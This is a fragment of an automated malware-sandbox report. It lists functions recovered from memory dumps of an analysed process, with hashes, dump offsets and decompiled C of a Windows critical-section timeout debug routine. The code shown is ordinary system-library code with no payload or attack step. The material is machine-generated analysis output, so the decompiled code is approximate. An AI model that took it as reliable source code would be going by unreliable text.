                                                • Instruction Fuzzy Hash: EBE02BA057834439F724FA705C03F137A480B01714F2545ADE498F9093D944D0154235
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0299F6D0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,02998D14,?), ref: 0299F6FB
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                • Instruction ID: 4be16981fbf355ae60eda97727c04ae728d6c05296c8584d0ed50cb71a931b19
                                                • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                • Instruction Fuzzy Hash: B4D0A7717503083BEB10FAA89C13F2772CD5B44B14F590064F948D73C3DE90F0004565
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0482967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ad45a019b63f788a1dd800a8ce50da6a4b517c0214d7219a06222c0cb69c98e1
                                                • Instruction ID: 303d7c5e005c6a5c33ed0897cdb7a41cc59ca0c4475d2ab6b9587f3b13fd68c1
                                                • Opcode Fuzzy Hash: ad45a019b63f788a1dd800a8ce50da6a4b517c0214d7219a06222c0cb69c98e1
                                                • Instruction Fuzzy Hash: 91B09BB19014D5C9F711D7604708717794077D0746F17C561D2024751A4778D1D5F5F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 0487FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 53%
                                                			E0487FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0482CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04875720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04875720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                0x0487fdda
                                                0x0487fde2
                                                0x0487fde5
                                                0x0487fdec
                                                0x0487fdfa
                                                0x0487fdff
                                                0x0487fe0a
                                                0x0487fe0f
                                                0x0487fe17
                                                0x0487fe1e
                                                0x0487fe19
                                                0x0487fe19
                                                0x0487fe19
                                                0x0487fe20
                                                0x0487fe21
                                                0x0487fe22
                                                0x0487fe25
                                                0x0487fe40

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0487FDFA
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0487FE2B
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0487FE01
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp Download File
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: 513bc6790fd2a456a27d297130f703b517e0a733b880875d11496f1a2e46f721
                                                • Instruction ID: c31929e441927226b616561706f955226260dbcb84d2303df2453f76bbf75cfd
                                                • Opcode Fuzzy Hash: 513bc6790fd2a456a27d297130f703b517e0a733b880875d11496f1a2e46f721
                                                • Instruction Fuzzy Hash: 42F0F676600601BFE7201A59DC02F33BBAAEB44770F140714F7289A5E1EAA2F86096F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%